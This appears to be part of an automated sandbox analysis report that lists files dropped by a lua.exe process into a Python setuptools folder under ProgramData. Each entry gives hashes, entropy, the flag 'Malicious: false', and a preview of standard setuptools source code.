SSDEEP:	48:q78eGJFbLllaqWhepPT7c4dAySPOMMyUTykbM643xu:FnVXaZsP845SPOMEnM7u
MD5:	848F427F19947B4D2018E0C534A08082
SHA1:	1C27418005494C3C11130CC0AAFC3A00604C186A
SHA-256:	6CC81E21E4625F34380C018F575DF6F24723C108C78CE594E059E00162D5EFC4
SHA-512:	23D10AED68B189AE6D2A7186FFD2BD2542FD28DBF7C48B0D360DE8118E02FE59E63EB3A8B452985EDA86BADACE2CBF281E8F4113D59BF95F4A77A820CF764B99
Malicious:	false
Preview:	from distutils import log, dir_util.import os..from setuptools import Command.from setuptools import namespaces.from setuptools.archive_util import unpack_archive.import pkg_resources...class install_egg_info(namespaces.Installer, Command):. """Install an .egg-info directory for the package""".. description = "Install an .egg-info directory for the package".. user_options = [. ('install-dir=', 'd', "directory to install to"),. ].. def initialize_options(self):. self.install_dir = None.. def finalize_options(self):. self.set_undefined_options('install_lib',. ('install_dir', 'install_dir')). ei_cmd = self.get_finalized_command("egg_info"). basename = pkg_resources.Distribution(. None, None, ei_cmd.egg_name, ei_cmd.egg_version. ).egg_name() + '.egg-info'. self.source = ei_cmd.egg_info. self.target = os.path.join(self.install_dir, basename). self.outputs = [].. d

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\install_lib.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3875
Entropy (8bit):	4.376777063152348
Encrypted:	false
SSDEEP:	48:ZCuXNDtnGdadLEJVzOuoyOQQtypGG7E0Hg9O8dUfW0vrY41cSK/vkYOAuwmdtMj/:Z/ia2J8umtkMAg9DU+0zYUkjpp
MD5:	214D864401AD4F7E8CC920D6CBE5D8A8
SHA1:	D9C16445A8945267182DA0B86CED1DC9F4FC69AD
SHA-256:	533E3631CB321D9023AC1E9CC3D13B073D31B1A4DBCF19CCD4F23D0818623ED1
SHA-512:	AE96A3E204C452CA179688220A147E4DF09B9A35A5C0183608719E43EE739F4E3C664942E2A08A596F6DFA344989D89A63A96E7264C130EE9DB7B4F01FBEDAD6
Malicious:	false
Preview:	import os.import sys.from itertools import product, starmap.import distutils.command.install_lib as orig...class install_lib(orig.install_lib):. """Don't add compiled flags to filenames of non-Python files""".. def run(self):. self.build(). outfiles = self.install(). if outfiles is not None:. # always compile, in case we have any extension stubs to deal with. self.byte_compile(outfiles).. def get_exclusions(self):. """. Return a collections.Sized collections.Container of paths to be. excluded for single_version_externally_managed installations.. """. all_packages = (. pkg. for ns_pkg in self._get_SVEM_NSPs(). for pkg in self._all_packages(ns_pkg). ).. excl_specs = product(all_packages, self._gen_exclusion_paths()). return set(starmap(self._exclude_pkg_path, excl_specs)).. def _exclude_pkg_path(self, pkg, exclusion_path):. """. Giv

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\install_scripts.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2519
Entropy (8bit):	4.37144379343325
Encrypted:	false
SSDEEP:	48:VPlS/UUWBo79exqWwwqzPJWwuW5BcH/U0g+2iOM6cDQJYJx+vULGH:JlSKKexZwwqzPw65M/Ng+bOM6cDQJEGH
MD5:	27B1DA3B8AA347D6C804D2E65B78DC00
SHA1:	7EB7EBC39D874B2BDFEC19444F8837978B4A3710
SHA-256:	C7BB1D1080AEC85A5A7F92EE597713A78F6862DF0478D6F02A45B63EFF935572
SHA-512:	159A22CEB2443F0E3D983ED46752C2E3850C89F26CA20EDD531BEACC6F446318DDCD456EF385E7FA77FF86E99A58E338DE0521C8C1E15739A63014563547C61A
Malicious:	false
Preview:	from distutils import log.import distutils.command.install_scripts as orig.import os.import sys..from pkg_resources import Distribution, PathMetadata, ensure_directory...class install_scripts(orig.install_scripts):. """Do normal script install, plus any egg_info wrapper scripts""".. def initialize_options(self):. orig.install_scripts.initialize_options(self). self.no_ep = False.. def run(self):. import setuptools.command.easy_install as ei.. self.run_command("egg_info"). if self.distribution.scripts:. orig.install_scripts.run(self) # run first to set up self.outfiles. else:. self.outfiles = []. if self.no_ep:. # don't install entry point scripts into .egg file!. return.. ei_cmd = self.get_finalized_command("egg_info"). dist = Distribution(. ei_cmd.egg_base, PathMetadata(ei_cmd.egg_base, ei_cmd.egg_info),. ei_cmd.egg_name, ei_cmd.egg_version,.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\launcher manifest.xml Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	628
Entropy (8bit):	4.569734347992454
Encrypted:	false
SSDEEP:	12:TMHdtlw+53gV8eXCSNewxCglY0kiVQxA0y:2dtlwe3grXRNpxDlYbi/T
MD5:	0B558625CA3F941533EC9F652837753C
SHA1:	403EE9B5C7A834A1B3905A87A4C6318E68609996
SHA-256:	C652DB8D6AC1D35B4A0B4FA195590E2A48923DBCCC9A5D9E38FB49FEE7029DB1
SHA-512:	956E70AF1B3DC200A70F70C04AA467522D96FC1A1ABF8928EF60BE72DF0BCBDEF50BBDCC20330EE4B5F9FCB0C7EE546849B5BE72EF9EE071475F6BBA2E405CBF
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>.<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">. <assemblyIdentity version="1.0.0.0". processorArchitecture="X86". name="%(name)s". type="win32"/>. Identify the application security requirements. -->. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">. <security>. <requestedPrivileges>. <requestedExecutionLevel level="asInvoker" uiAccess="false"/>. </requestedPrivileges>. </security>. </trustInfo>.</assembly>.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\py36compat.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4946
Entropy (8bit):	4.17397434301304
Encrypted:	false
SSDEEP:	48:cOJFEukBcwl6mALdRLnaGJGDHpdWe/NTA5PCh7/EN2WrxAuW0sqD9eBnSWvAvWQ5:bk/6mALnLnx8TWuxqPCaNF693R4OQ66v
MD5:	4630E987A636EDB9A7D34BE5B54F193E
SHA1:	8933413BE98BBEABDC068D7F7C492E62723E7FCC
SHA-256:	EF22D6CD08F5EFD127C77A49F15D5C0C30B378B30531DF5725794AFA2653AB96
SHA-512:	5EA5541407F51D4869A971512D49BE912425F5C4D3FE6092AB5A09EF7CB5AC5565AEBCE0DEEF4233CA3371B315B06DCA42076DA3A3ED78053D717F2C36901D32
Malicious:	false
Preview:	import os.from glob import glob.from distutils.util import convert_path.from distutils.command import sdist...class sdist_add_defaults:. """. Mix-in providing forward-compatibility for functionality as found in. distutils on Python 3.7... Do not edit the code in this class except to update functionality. as implemented in distutils. Instead, override in the subclass.. """.. def add_defaults(self):. """Add all the default files to self.filelist:. - README or README.txt. - setup.py. - test/test*.py. - all pure Python modules mentioned in setup script. - all files pointed by package_data (build_py). - all files defined in data_files.. - all files defined as scripts.. - all C sources listed as part of extensions or C libraries. in the setup script (doesn't catch C headers!). Warns if (README or README.txt) or setup.py are missing; everything. else is optional..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\register.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	468
Entropy (8bit):	4.443299016300185
Encrypted:	false
SSDEEP:	12:1BNJKTMegOYZ2xoqHgDcIgZmCWgHSZ8G0DllYm9/p2yWG9qH2:1BNAMegT2gQIgZ73HSCGillYO/j922
MD5:	58E7138E8EDFA64DD5B58348C9C9141A
SHA1:	50972F4E50B1F2A414FD028B22FDF16754B59C14
SHA-256:	924DC3C5709BE655D3BEA9E17F0C7683AABB8B06D49A04F25D409A068A013949
SHA-512:	81CAF02BE7B4EDB937C1FE2B15C71153CD6F98F131A8C4953B7778A5957ABF39BFBB34522862BB4DBCA935668FF67A7A6D0802199BABBBB390FA6D451760C929
Malicious:	false
Preview:	from distutils import log.import distutils.command.register as orig..from setuptools.errors import RemovedCommandError...class register(orig.register):. """Formerly used to register packages on PyPI.""".. def run(self):. msg = (. "The register command has been removed, use twine to upload ". + "instead (https://pypi.org/p/twine)". ).. self.announce("ERROR: " + msg, log.ERROR).. raise RemovedCommandError(msg).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\rotate.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2128
Entropy (8bit):	4.2046614569731116
Encrypted:	false
SSDEEP:	24:1BNMBJMf4X6mJqne54sDK0DpVdJzR1iRoSP1i53NKzbW1iiQIEqsrmf5Mcut4ix7:GggX6+uKxMXdK3GbEvXxyzxdMiFnNb
MD5:	3EBD81D353415030EAB02711E30D10AF
SHA1:	DE8E175DC3729C35B755E21FDF02E9196972F79E
SHA-256:	4AFB103DAB1ECC8A233E3BCC9DF92ACE1F0FD14D2D0A3D1D69CCC5F2E7373503
SHA-512:	E2C925379757A71CA119F9A0213121DB101912BF346395E9FFB56C0003DA23C686BC4E4D15F84AE936540A48382E1E5C483E34B4987A1D13C8133EE7D2103C30
Malicious:	false
Preview:	from distutils.util import convert_path.from distutils import log.from distutils.errors import DistutilsOptionError.import os.import shutil..from setuptools import Command...class rotate(Command):. """Delete older distributions""".. description = "delete older distributions, keeping N newest files". user_options = [. ('match=', 'm', "patterns to match (required)"),. ('dist-dir=', 'd', "directory where the distributions are"),. ('keep=', 'k', "number of matching distributions to keep"),. ].. boolean_options = [].. def initialize_options(self):. self.match = None. self.dist_dir = None. self.keep = None.. def finalize_options(self):. if self.match is None:. raise DistutilsOptionError(. "Must specify one or more (comma-separated) match patterns ". "(e.g. '.zip' or '.egg')". ). if self.keep is None:. raise DistutilsOptionError("Must specify number of fi

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\saveopts.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	658
Entropy (8bit):	4.244659656315678
Encrypted:	false
SSDEEP:	12:1i2QWDLVrxxCLpvbJqKoMqOv+Ffz6zYFrz2ZwXIEuQGsGDpZsHYjX:1VHxUAMt+ZWYtz2kbGHZ
MD5:	C71D737DBD265D3E39FA6ACD75A75B33
SHA1:	AA2FC2B16C59EC6688923535442CBF1ECF52D235
SHA-256:	CDAED00817108A628AAE259CA0271B8713E3533DF481207BE33B932F8EF1A4FE
SHA-512:	4CBF935FB3C9B14B5D4F61FA1825CA9D05B69F360F802B8E782A00A0C2AA0396A825AA3332F9A4C4EB10DBEB4A760FC47639A396A367D77CD59410FAFCB0C3C9
Malicious:	false
Preview:	from setuptools.command.setopt import edit_config, option_base...class saveopts(option_base):. """Save command-line options to a file""".. description = "save supplied options to setup.cfg or other config file".. def run(self):. dist = self.distribution. settings = {}.. for cmd in dist.command_options:.. if cmd == 'saveopts':. continue # don't save our own options!.. for opt, (src, val) in dist.get_option_dict(cmd).items():. if src == "command line":. settings.setdefault(cmd, {})[opt] = val.. edit_config(self.filename, settings, self.dry_run).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\sdist.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6970
Entropy (8bit):	4.365910112806622
Encrypted:	false
SSDEEP:	192:89vAl+pXhlqfs7LE0Ix69x2hLHxQp328DoSPr:894ApXFEuR2hSD
MD5:	BA58C4E598474B14AD2E37CE7CACDADD
SHA1:	8DC13604353E106AA844AD348D44A7B3D73623E9
SHA-256:	4756EDF788BF46C70C78FC0A4B58814AF765A451517E1E6208F92E72CC71D282
SHA-512:	DB52D608DB017A458CBB2B5690A805A0A926F1B3C92BFE2905F3706A49C7997B63E7D673EFB756CC6EA299037070B0C05AEF24D4D8C0200140D33B676976B5E1
Malicious:	false
Preview:	from distutils import log.import distutils.command.sdist as orig.import os.import sys.import io.import contextlib..from setuptools.extern import ordered_set..from .py36compat import sdist_add_defaults..import pkg_resources.._default_revctrl = list...def walk_revctrl(dirname=''):. """Find all files under revision control""". for ep in pkg_resources.iter_entry_points('setuptools.file_finders'):. for item in ep.load()(dirname):. yield item...class sdist(sdist_add_defaults, orig.sdist):. """Smart sdist that finds anything supported by revision control""".. user_options = [. ('formats=', None,. "formats for source distribution (comma-separated list)"),. ('keep-temp', 'k',. "keep the distribution tree around after creating " +. "archive file(s)"),. ('dist-dir=', 'd',. "directory to put the source distribution archive(s) in ". "[default: dist]"),. ].. negative_opt = {}.. README_EXTENSIONS = [''

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\setopt.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5051
Entropy (8bit):	4.279951911797425
Encrypted:	false
SSDEEP:	96:CvB9XnT98yXvn3wZUFesRGem2xpaP6awe:oT93XNtGiE6aP
MD5:	D08562098C3CE004F8269D8A3B85F626
SHA1:	A05ECD78E207359D99B8C701A1D461C5C820A3C2
SHA-256:	2E272A957A1C90BA8138760F36FD49D37D87C6804A0F81CE1C1D75AA6FEDF81B
SHA-512:	BEEB4563B3B6A39A0EF872F24171DD25293E074DEE7BAAF28AF2865474ABA29593D6BFDA737E56433428C2267C67CB2711F6C4B7B2FF291D2643E86FA51B686C
Malicious:	false
Preview:	from distutils.util import convert_path.from distutils import log.from distutils.errors import DistutilsOptionError.import distutils.import os.import configparser..from setuptools import Command..__all__ = ['config_file', 'edit_config', 'option_base', 'setopt']...def config_file(kind="local"):. """Get the filename of the distutils, local, global, or per-user config.. `kind` must be one of "local", "global", or "user". """. if kind == 'local':. return 'setup.cfg'. if kind == 'global':. return os.path.join(. os.path.dirname(distutils.__file__), 'distutils.cfg'. ). if kind == 'user':. dot = os.name == 'posix' and '.' or ''. return os.path.expanduser(convert_path("~/%spydistutils.cfg" % dot)). raise ValueError(. "config_file() type must be 'local', 'global', or 'user'", kind. )...def edit_config(filename, settings, dry_run=False):. """Edit a configuration file to include `settings`.. `settings` is a dictiona

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\test.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9469
Entropy (8bit):	4.363351402111398
Encrypted:	false
SSDEEP:	96:WHWWhAkVG7lgRGQn8GdOJ5R1t0grlZrkx+sDi8b2hz6ztGtTt1JJFTBIKP7Qzlva:WHrk7lfGGsor+DD9InFeKPszQ
MD5:	B9CB5909316D49B81E312C05F0D14DF6
SHA1:	C576C17FD75A1285EF956CBC3DC23E8449B810E5
SHA-256:	6388F08DD5FFE030A29889AAE9F0D6A07CC19E25C3349544703E97C55648612D
SHA-512:	AE80209DE24DCE005955E87AB39D5D0B990453570185CE31047184DFE6B7CDEA4FFFBC3018FB961F3EB9FB6AE7531678F7C5630CB0B4640154ACF79DC0450F13
Malicious:	false
Preview:	import os.import operator.import sys.import contextlib.import itertools.import unittest.from distutils.errors import DistutilsError, DistutilsOptionError.from distutils import log.from unittest import TestLoader..from pkg_resources import (resource_listdir, resource_exists, normalize_path,. working_set, _namespace_packages, evaluate_marker,. add_activation_listener, require, EntryPoint).from setuptools import Command.from .build_py import _unique_everseen...class ScanningLoader(TestLoader):.. def __init__(self):. TestLoader.__init__(self). self._visited = set().. def loadTestsFromModule(self, module, pattern=None):. """Return a suite of all tests cases contained in the given module.. If the module is a package, load tests from all the modules in it.. If the module has an ``additional_tests`` function, call it and add. the return value to the tests.. """. if module in self._

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\upload.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	462
Entropy (8bit):	4.465772612419235
Encrypted:	false
SSDEEP:	12:1BNJtNMZ20YZ2xoqHgD36mCWZ8dJDllYm9/p2yWVk9qH2:1BNJMIR2gmSC/llYO/ik922
MD5:	DCB51BA66DBBF1DA3C745B009B011220
SHA1:	BDA85F9DC7B71594AB2BC0F2930A70C669E27786
SHA-256:	5D3DD81557D83C0980E6A8468347AE96E53DF1FB714545BE3F329C38330BC54B
SHA-512:	DA048DF52450FECD76AFF463D00F421693B2F996770E682B56A5FBDB2DE77EF8A99083E1AED8487962B3127D231282788109E61499DBEFE14D435272377F76F9
Malicious:	false
Preview:	from distutils import log.from distutils.command import upload as orig..from setuptools.errors import RemovedCommandError...class upload(orig.upload):. """Formerly used to upload packages to PyPI.""".. def run(self):. msg = (. "The upload command has been removed, use twine to upload ". + "instead (https://pypi.org/p/twine)". ).. self.announce("ERROR: " + msg, log.ERROR). raise RemovedCommandError(msg).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\upload_docs.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7151
Entropy (8bit):	4.483628876623972
Encrypted:	false
SSDEEP:	96:f6RinB2g/a8z2hfGQGg0BefCAqcheluUq5Z6kfr5lT7QlPcOf3C:f6R44g/hCdist15h4C
MD5:	7A4885FA092B63C546EB45151D827AB3
SHA1:	FA90AE0E6049DD6993AC51150CB8CEEA83465844
SHA-256:	E3CD8177B92C0417F37689318CD42F9D1D00E9D83C5CE391120F700790702AD5
SHA-512:	6203C1B01A1556485F05062A74C6A6D315E7C4B7CCC5A6226E0AD5A72A4704C3490A6E678D48198895600E82547B74A9F4598ABCF18BF63E5087459CBD38951E
Malicious:	false
Preview:	# -- coding: utf-8 --."""upload_docs..Implements a Distutils 'upload_docs' subcommand (upload documentation to.PyPI's pythonhosted.org).."""..from base64 import standard_b64encode.from distutils import log.from distutils.errors import DistutilsOptionError.import os.import socket.import zipfile.import tempfile.import shutil.import itertools.import functools.import http.client.import urllib.parse..from pkg_resources import iter_entry_points.from .upload import upload...def _encode(s):. return s.encode('utf-8', 'surrogateescape')...class upload_docs(upload):. # override the default repository as upload_docs isn't. # supported by Warehouse (and won't be).. DEFAULT_REPOSITORY = 'https://pypi.python.org/pypi/'.. description = 'Upload documentation to PyPI'.. user_options = [. ('repository=', 'r',. "url of repository [default: %s]" % upload.DEFAULT_REPOSITORY),. ('show-response', None,. 'display full response text from server'),. ('uplo

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\config.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	21485
Entropy (8bit):	4.319404633382597
Encrypted:	false
SSDEEP:	192:xfEaJ6ACVNYGQrlDgwy7gpa3iinbThGMaeFWkIVXqF2QoXlhaA8DW2VdrI/X3hNQ:xPzF1JbKikTeVvVXqF2vXn2DUzQSid
MD5:	E7CB7ADC2F8E595ED6A7325AC41534D3
SHA1:	16245C97CF4674DEF70C50E79788319F71CE72D7
SHA-256:	354AEC556E78A71602B9E91F25B57B07AC322B3BF36AD5CCE734F82EA9DE816A
SHA-512:	BE2CC008634D39F98D0156234E5A6D9B8B31A11B4082E242DF3C345E6DBA262E57FF56DC7A531F24E3F951C6FFB28F5111ABB4EECFA01A09D0C1DE6C5DAF3B2E
Malicious:	false
Preview:	import ast.import io.import os.import sys..import warnings.import functools.import importlib.from collections import defaultdict.from functools import partial.from functools import wraps.import contextlib..from distutils.errors import DistutilsOptionError, DistutilsFileError.from setuptools.extern.packaging.version import LegacyVersion, parse.from setuptools.extern.packaging.specifiers import SpecifierSet...class StaticModule:. """. Attempt to load the module by the name. """. def __init__(self, name):. spec = importlib.util.find_spec(name). with open(spec.origin) as strm:. src = strm.read(). module = ast.parse(src). vars(self).update(locals()). del self.self.. def __getattr__(self, attr):. try:. return next(. ast.literal_eval(statement.value). for statement in self.module.body. if isinstance(statement, ast.Assign). for target in statement.targets.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\dep_util.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	949
Entropy (8bit):	4.404942226828133
Encrypted:	false
SSDEEP:	24:1BNM0O1z8cxiMT6HAMN7fgq+2MzM2Lwa92Bsfy6:GScAM3MN7II2Lrg2fy6
MD5:	5213C4DEF0C6B3B0591E6E47D9B17BF9
SHA1:	19D6FA8BFD46D56D0F06ACB86D6ECA40F6935071
SHA-256:	043C75064CCD427B6F001E1A972A476D6E54541CE3AAD86CD34D0FAD42F866A7
SHA-512:	3DE83719A00EEB7CB2B81D8EBE55C3343BD03D9BDF620692B7B44D84F6BAD481321964872DA56A2EA8C13835C146A221FD6A3C8D71239E6EBE8F3F9007CA38AB
Malicious:	false
Preview:	from distutils.dep_util import newer_group...# yes, this is was almost entirely copy-pasted from.# 'newer_pairwise()', this is just another convenience.# function..def newer_pairwise_group(sources_groups, targets):. """Walk both arguments in parallel, testing if each source group is newer. than its corresponding target. Returns a pair of lists (sources_groups,. targets) where sources is newer than target, according to the semantics. of 'newer_group()'.. """. if len(sources_groups) != len(targets):. raise ValueError(. "'sources_group' and 'targets' must be the same length").. # build a pair of lists (sources_groups, targets) where source is newer. n_sources = []. n_targets = []. for i in range(len(sources_groups)):. if newer_group(sources_groups[i], targets[i]):. n_sources.append(sources_groups[i]). n_targets.append(targets[i]).. return n_sources, n_targets.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\depends.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5474
Entropy (8bit):	4.522053516426543
Encrypted:	false
SSDEEP:	96:kb/F5OP5wmOpIPRx5f9K0bMkobjSSWIochtdqsshVmWXbtDI:kbGwWq0Ak2SSWRch23V76
MD5:	14C5E7E6D8244A22C20D12A3A851C8BB
SHA1:	232403A450980C3DF89EF7384158E13C6487353B
SHA-256:	8877D974B7650AED81965485F5B460ECD534A2A6CF58C1FC9639B806EC100D8D
SHA-512:	4D12C53599A88021FDAA4E5FD33A756EE04F6EA5191BADA19CA7DA489A9C864F2D795492160F1E49FDFB6248400AB5BF25D9E0D7BA1485897C50FAABE508E1D8
Malicious:	false
Preview:	import sys.import marshal.import contextlib.import dis.from distutils.version import StrictVersion..from ._imp import find_module, PY_COMPILED, PY_FROZEN, PY_SOURCE.from . import _imp...__all__ = [. 'Require', 'find_module', 'get_module_constant', 'extract_constant'.]...class Require:. """A prerequisite to building or installing a distribution""".. def __init__(. self, name, requested_version, module, homepage='',. attribute=None, format=None):.. if format is None and requested_version is not None:. format = StrictVersion.. if format is not None:. requested_version = format(requested_version). if attribute is None:. attribute = '__version__'.. self.__dict__.update(locals()). del self.self.. def full_name(self):. """Return full package/distribution name, w/version""". if self.requested_version is not None:. return '%s-%s' % (self.name, self.requested_ver

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\dist.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	38405
Entropy (8bit):	4.412608388314868
Encrypted:	false
SSDEEP:	768:ezm1KZG2aa1RHMSjxY/YSrPPbRi5pEUg5bdse6xNfn+tXiu2EWdSPL:ezm12aagSiASrP4Yt5b+ER
MD5:	80EB3C4A4DBABAA93C47FF86F7808516
SHA1:	76662FD4E9362EAC7C7F5475D2E36E86E8FE8A5E
SHA-256:	9AC5A38D435CCC45D53B91FF5FE5F1E98D34FFD54CFD2D3F7080567A1AE45513
SHA-512:	84614BB9568E04945D18D8C55199F8CE2B7493E2AEEB00CC9A633704CD585972BDD65C4C486D6413BE06D6CD6328094F7BD932EE045B20306E820530B273E76C
Malicious:	false
Preview:	# -- coding: utf-8 --.__all__ = ['Distribution']..import io.import sys.import re.import os.import warnings.import numbers.import distutils.log.import distutils.core.import distutils.cmd.import distutils.dist.from distutils.util import strtobool.from distutils.debug import DEBUG.from distutils.fancy_getopt import translate_longopt.import itertools..from collections import defaultdict.from email import message_from_file..from distutils.errors import DistutilsOptionError, DistutilsSetupError.from distutils.util import rfc822_escape.from distutils.version import StrictVersion..from setuptools.extern import packaging.from setuptools.extern import ordered_set..from . import SetuptoolsDeprecationWarning..import setuptools.from setuptools import windows_support.from setuptools.monkey import get_unpatched.from setuptools.config import parse_configuration.import pkg_resources..__import__('setuptools.extern.packaging.specifiers').__import__('setuptools.extern.packaging.version')...def _get_unpa

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\errors.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	524
Entropy (8bit):	4.439909716177752
Encrypted:	false
SSDEEP:	12:SSfOR0FzNMy2xZADSqHgBTYePg1CiYZ2SKjc0RRvHlJ9HssKQPTj:VfOOMfA+28TnPtZ2SKVLflJBssBrj
MD5:	D02DE39FF3CEF7AB3F31565B1D1B237C
SHA1:	15A5C9A5651A0E1E2A03017E535EF6398BD7575B
SHA-256:	31539CBF7F351CD49A8C3804516CCE43827A0790470813128C77DA59C130035A
SHA-512:	110DEEEA5A99FE72C3F0FC7D6D55827189C2BA4E90022F1790FEE09A2369005ECF4C5C2690381DB9E6E997C46BA239F5EF3BAB42B40CEDB933A36BA7A75B0912
Malicious:	false
Preview:	"""setuptools.errors..Provides exceptions used by setuptools modules.."""..from distutils.errors import DistutilsError...class RemovedCommandError(DistutilsError, RuntimeError):. """Error used for commands that have been removed in setuptools... Since ``setuptools`` is built on ``distutils``, simply removing a command. from ``setuptools`` will make the behavior fall back to ``distutils``; this. error is raised if a command exists in ``distutils`` but has been actively. removed in ``setuptools``.. """.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\extension.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1684
Entropy (8bit):	4.5751305198533725
Encrypted:	false
SSDEEP:	24:oMtM1LMOJOqiCGjyMFy8WanVXZzGl7MV4FMZAGmVPEldAgALg0OqBy7oDAcOaA32:/C6vdxQaVXZzbJWVkdELAUcnaVjH
MD5:	6B5316C5706DEF9B28848C3F33CC66AC
SHA1:	E41419FCE1FD3554FB6F076B8555B70D653C9299
SHA-256:	34C338E978CD7557A559E99CD31F02C95280E4AB3A666DF14D6480D924BAC593
SHA-512:	B53B756E8D0BFFED09E64D7BB9FDBA8282041AAE925D4BA2C042D6A41831A5A68FF95B0C45AD17743BD63C973C09B89CF85ECC1A7D9AB89C8DF22368AB34D710
Malicious:	false
Preview:	import re.import functools.import distutils.core.import distutils.errors.import distutils.extension..from .monkey import get_unpatched...def _have_cython():. """. Return True if Cython can be imported.. """. cython_impl = 'Cython.Distutils.build_ext'. try:. # from (cython_impl) import build_ext. __import__(cython_impl, fromlist=['build_ext']).build_ext. return True. except Exception:. pass. return False...# for compatibility.have_pyrex = _have_cython.._Extension = get_unpatched(distutils.core.Extension)...class Extension(_Extension):. """Extension that uses '.c' files in place of '.pyx' files""".. def __init__(self, name, sources, args, kw):. # The args is needed for compatibility as calls may use positional. # arguments. py_limited_api may be set only via keyword.. self.py_limited_api = kw.pop("py_limited_api", False). _Extension.__init__(self, name, sources, args, *kw).. def _convert_pyx_sourc

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\extern\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2121
Entropy (8bit):	4.225977257280707
Encrypted:	false
SSDEEP:	48:kcAd8WP+KzxY43fHpCm2rCkALsIy+FSW50:kpdXPdf3/ArVMa
MD5:	96F55B44DB40D031B41892C0AE228D3E
SHA1:	669F4C6C08B8984D47677FDA3A5EE6B94512F4A6
SHA-256:	E7D9A93CD606A33BD75DB00AAF195D3A61CB605C810B869AA188A160790A9C9D
SHA-512:	B5834CA8A8954ACDB60F1498C2C34BC18976FEC9E02C7E71CC20E95CDE68ABF00117C9BE771683335A3D38C652650B3C582986CAB1B5AC1B6879471012D32DBD
Malicious:	false
Preview:	import sys...class VendorImporter:. """. A PEP 302 meta path importer for finding optionally-vendored. or otherwise naturally-installed packages from root_name.. """.. def __init__(self, root_name, vendored_names=(), vendor_pkg=None):. self.root_name = root_name. self.vendored_names = set(vendored_names). self.vendor_pkg = vendor_pkg or root_name.replace('extern', '_vendor').. @property. def search_path(self):. """. Search first the vendor package then as a natural package.. """. yield self.vendor_pkg + '.'. yield ''.. def find_module(self, fullname, path=None):. """. Return self when fullname starts with root_name and the. target module is one vendored through this importer.. """. root, base, target = fullname.partition(self.root_name + '.'). if root:. return. if not any(map(target.startswith, self.vendored_names)):. return. retu

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\glob.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5084
Entropy (8bit):	4.466152870050856
Encrypted:	false
SSDEEP:	96:9dtwZaQ4yZs4V5Q4yZsCzjUCP08wuxf0vvN3H79WqMoF5Ke/mjkugSqPGAOk+lgj:BQ7ZXfQ7ZPRsFC8ESSqexOtx
MD5:	17EBB70EE46F96A10F536127AE250E09
SHA1:	15AB683DBC4874557DF329B8CBCCC3F058158BCF
SHA-256:	A3BE5C1EB3B162CBE7F39E2D852C44D31F64F09ACA0EE84FFEB457955074D10E
SHA-512:	682D18B09C2598BB0CFFC1776C7BECFB103C02943D4BB52B81241FCAC90B5A4F818F7F98505CDC393918C813A5F7E815B8C42F0A8E644F5E800913B058AB9235
Malicious:	false
